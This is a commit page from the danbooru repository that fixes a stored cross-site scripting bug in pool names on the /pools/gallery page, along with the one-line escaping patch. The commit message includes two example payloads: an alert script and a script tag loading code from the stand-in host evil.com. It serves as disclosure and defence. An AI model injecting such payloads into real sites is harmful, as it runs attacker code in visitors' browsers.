jaculabilis/danbooru
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Fix XSS in pool names in /pools/gallery page.

Browse Source 
1) Set a pool name to '<script>alert("xss")</script>'.
2) Wait for people to view it in /pools/gallery.

At first glance the fact that the pool name is truncated to 80 chars
appears to limit how much can be done in the exploit. This poses no
problem though, since someone could inject '<script src="http://www.evil.com/evil.js"></script>' instead.
This commit is contained in:
evazion
2014-09-30 03:04:48 -05:00
parent 1919bbf07e
commit 22c624c356
1 changed files with 1 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
app/presenters/post_presenter.rb
View File

@@ -27,7 +27,7 @@ class PostPresenter < Presenter
if options[:pool]
html << %{<p class="desc">}
html << %{<a href="/pools/#{options[:pool].id}">}
html << options[:pool].pretty_name.truncate(80)
html << h(options[:pool].pretty_name.truncate(80))
html << %{</a>}
html << %{</p>}
end